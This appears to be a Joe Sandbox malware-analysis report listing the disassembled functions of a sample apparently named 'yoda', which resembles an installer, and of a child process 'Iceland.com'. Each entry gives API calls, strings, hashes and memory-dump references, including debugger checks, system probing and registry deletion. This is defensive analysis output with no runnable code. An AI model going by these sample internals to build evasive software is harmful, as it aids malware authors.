Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

..., xrefs: 004062BF
%02x%c, xrefs: 0040629C

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00402100
GetDeviceCaps.GDI32 ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,759223A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110,0042012C,?), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32 ref: 004063CA

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32 ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32 ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: Iceland.comPID: 2800, Parent PID: 5040COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	68

Executed Functions

Function 00915FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00915FF7

Part of subcall function 00918577: _wcslen.LIBCMT ref: 0091858A

GetCurrentProcess.KERNEL32(?,009ADC2C,00000000,?,?), ref: 00916123
IsWow64Process.KERNEL32(00000000,?,?), ref: 0091612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00916155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00916167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00916175
FreeLibrary.KERNEL32(00000000,?,?), ref: 0091617C
GetSystemInfo.KERNEL32(?,?,?), ref: 009161A1

Strings

GetNativeSystemInfo, xrefs: 00916161
|O, xrefs: 009550F7
kernel32.dll, xrefs: 00916150

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 392a895936be291fb1c8834b98ca15ba3fd865eebc5e8073ea6b637354131484
Instruction ID: 94ddeff42420a3b65bb21451569c9ad8c538867cff48b15ee7b6fd056b85e8c7
Opcode Fuzzy Hash: 392a895936be291fb1c8834b98ca15ba3fd865eebc5e8073ea6b637354131484
Instruction Fuzzy Hash: CBA1B62192E7C4DFC711DB797CC22E57F6C6B26B01B086899D4819B223C66D4D88EF71

Function 0091338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00913368,?), ref: 009133BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00913368,?), ref: 009133CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,009E2418,009E2400,?,?,?,?,?,?,00913368,?), ref: 0091343A

Part of subcall function 00918577: _wcslen.LIBCMT ref: 0091858A

Part of subcall function 0091425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00913462,009E2418,?,?,?,?,?,?,?,00913368,?), ref: 009142A0

SetCurrentDirectoryW.KERNEL32(?,00000001,009E2418,?,?,?,?,?,?,?,00913368,?), ref: 009134BB
